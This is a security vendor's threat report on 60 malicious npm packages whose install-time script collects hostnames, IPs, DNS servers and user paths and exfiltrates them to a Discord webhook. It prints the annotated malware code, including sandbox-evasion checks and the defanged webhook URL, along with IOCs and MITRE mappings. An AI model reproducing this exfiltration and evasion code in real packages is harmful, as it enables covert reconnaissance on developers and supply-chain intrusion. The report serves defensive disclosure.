Socket’s Threat Research Team has uncovered an active campaign in the npm ecosystem that now spans 60 packages published under three npm accounts. Each package carries a small install‑time script that, when triggered during npm install, collects hostnames, internal and external IP addresses, DNS server lists, and user directory paths, then exfiltrates the data to a Discord webhook under the threat actor’s control.

The first package emerged eleven days ago and the most recent appeared only hours before this publication, confirming the operation is still under way. The script targets Windows, macOS or Linux systems, and includes basic sandbox‑evasion checks, making every infected workstation or continuous‑integration node a potential source of valuable reconnaissance. Combined downloads now exceed 3,000, giving the threat actor a growing map of developer and enterprise networks that can guide future intrusions. As of this writing, all packages remain live on npm. We have petitioned for their removal.

First three malicious packages released under the npm accounts bbbb335656, cdsfdfafd1232436437, and sdsds656565. Each account went on to publish twenty malicious packages in total.

Inside the Code#

The script performs reconnaissance with the sole purpose of fingerprinting each machine that builds or installs the package. By collecting both internal and external network identifiers, it links private developer environments to their public‑facing infrastructure — ideal for follow‑on targeting. The selective sandbox escapes indicate the threat actor wants real victims, not sandboxes or research VMs.

The annotated code snippets below demonstrate the malicious logic inside the seatable package. This payload is identical across all 60 packages published by the threat actor.

const os = require("os");                // Gathers host and user details
const dns = require("dns");              // Reads system DNS servers
const https = require("https");
const packageJSON = require("./package.json");
const package = packageJSON.name;        // Fingerprints which malicious pkg ran

// ---------- Local network inspection ------------
function getIPAddress() {                // Enumerates local NICs
  const networkInterfaces = os.networkInterfaces();
  ...
  if (alias.family === 'IPv4' && !alias.internal) {
      return alias.address;              // Captures internal IP
  }
}

// ---------- Public network inspection ------------
function getExternalIP(cb) {             // Queries ipinfo[.]io for external IP
  https.get('https://ipinfo.io/json', (res) => { ... });
}

// ---------- Virtualization / Sandbox evasion ------
if ( externalHost.includes("compute.amazonaws.com") ||    // AWS
     externalHost.includes("bc.googleusercontent.com") || // GCP
     externalHost.includes("default-rdns.vocus.co.nz") || // Sandboxes
     internalHost.includes("LD.local") ||                 // Lab domain
     homedir.match(/justin|mal_data|malicious/i) ) {      // Research VMs
     return;                           // Abort if running in known test envs
}

// ---------- Exfiltration to a Discord webhook -----
const trackingData = JSON.stringify({            // Builds large JSON blob:
     package, directory: __dirname, home_directory: os.homedir(),
     username: os.userInfo().username, dns: dns.getServers(),
     internal_hostname: os.hostname(), internal_ip: getIPAddress(),
     external_ip: ext.ip, external_hostname: ext.hostname, organization: ext.org,
     resolved_url: packageJSON.___resolved, package_version: packageJSON.version,
     package_json: packageJSON, package_type: 'npm'
});

const webhookURL = "hxxps://discord[.]com/api/webhooks/1330015051482005555/5fll497pcjzKBiY3b_oa9YRh-r5Lr69vRyqccawXuWE_horIlhwOYzp23JWm-iSXuPfQ";
https.request(webhookURL, {...}).write(JSON.stringify({content:`\`\`\`json\n${trackingData}\n\`\`\``}));

The script gathers enough information to connect an organization’s internal network to its outward‑facing presence. By harvesting internal and external IP addresses, DNS servers, usernames, and project paths, it enables a threat actor to chart the network and identify high‑value targets for future campaigns.

On continuous‑integration servers, the leak can reveal internal package registry URLs and build paths, intelligence that speeds up subsequent supply chain attacks. While the current payload is limited to reconnaissance, it creates a strategic risk by laying the foundation for deeper intrusions.

60 Packages at a Glance#

The accounts bbbb335656 (registration email npm9960+1@gmail[.]com), sdsds656565 (registration email npm9960+2@gmail[.]com), and cdsfdfafd1232436437 (registration email npm9960+3@gmail[.]com), each show twenty packages published within an eleven‑day span. All 60 packages carry the same host‑fingerprinting code that exfiltrates data to the same Discord webhook. For instance, seatable (from bbbb335656), datamart (from sdsds656565), and seamless-sppmy (from cdsfdfafd1232436437) embed the identical malicious payload shown below.

Socket AI Scanner’s analysis, including contextual details about the malicious seatable package.

Outlook and Recommendations

The campaign remains active. Unless the npm registry removes the malicious packages and suspends the related accounts, more releases are likely. The threat actor can easily clone the script, track download telemetry in real time, and publish again. More than 3,000 installs without removal demonstrate that quiet reconnaissance is an effective foothold technique on npm and one that others may emulate.

Because the registry offers no guardrails for post‑install hooks, expect new throwaway accounts, fresh packages, alternative exfiltration endpoints, and perhaps larger payloads once a target list is complete. Defenders should assume the threat actor will continue publishing, refine evasion checks, and pivot to follow‑on intrusions that exploit the mapping already collected.

Defenders should adopt dependency‑scanning tools that surface post‑install hooks, hardcoded URLs, and unusually small tarballs. They should also strengthen the development pipeline with automated checks. The free Socket GitHub app and CLI flag suspicious patterns in pull requests and during package installs, while the Socket browser extension shows risk scores as you browse online. Together, these layers of scrutiny reduce the likelihood that a malicious package enters your codebase.

Indicators of Compromise (IOCs)#

Malicious Packages by Account

bbbb335656 (registration email npm9960+1@gmail[.]com) – 20 packages

1. e-learning-garena
2. inhouse-root
3. event-sharing-demo
4. hermes-inspector-msggen
5. template-vite
6. flipper-plugins
7. appium-rn-id
8. bkwebportal
9. gop_status_frontend
10. index_patterns_test_plugin
11. seatable
12. zdauth
13. mix-hub-web
14. chromastore
15. performance-appraisal
16. choosetreasure
17. rapper-wish
18. 12octsportsday
19. credit-risk
20. raffle-node

sdsds656565 (registration email npm9960+2@gmail[.]com) – 20 packages

1. coral-web-be
2. garena-react-template-redux
3. sellyourvault
4. admin-id
5. seacloud-database
6. react-xterm2
7. bkeat-pytest
8. mysteryicons
9. mshop2
10. xlog-admin-portal
11. datamart
12. garena-admin
13. estatement-fe
14. kyutai-client
15. tgi-fe
16. gacha-box
17. tenslots
18. refreshrewards
19. codeword
20. sps

cdsfdfafd1232436437 (registration email npm9960+3@gmail[.]com) – 20 packages

1. seatalk-rn-leave-calendar
2. netvis
3. input_control_vis
4. env-platform
5. web-ssar
6. hideoutpd
7. arcademinigame
8. customer-center
9. team-portal
10. dof-ff
11. seamless-sppmy
12. accumulate-win
13. sfc-demo
14. osd_tp_custom_visualizations
15. routing-config
16. gunbazaar
17. mbm-dgacha
18. wsticket
19. all-star-2019
20. data-portal-dwh-apps-fe

Exfiltration Endpoint

• hxxps://discord[.]com/api/webhooks/1330015051482005555/5fll497pcjzKBiY3b_oa9YRh-r5Lr69vRyqccawXuWE_horIlhwOYzp23JWm-iSXuPfQ

MITRE ATT&CK#

• T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain
• T1059.007 — Command and Scripting Interpreter: JavaScript
• T1567.004 — Exfiltration Over Web Service: Exfiltration Over Webhook
• T1590 — Gather Victim Network Information
• T1590.002 — Gather Victim Network Information: DNS
• T1590.005 — Gather Victim Network Information: IP Addresses
• T1497 — Virtualization/Sandbox Evasion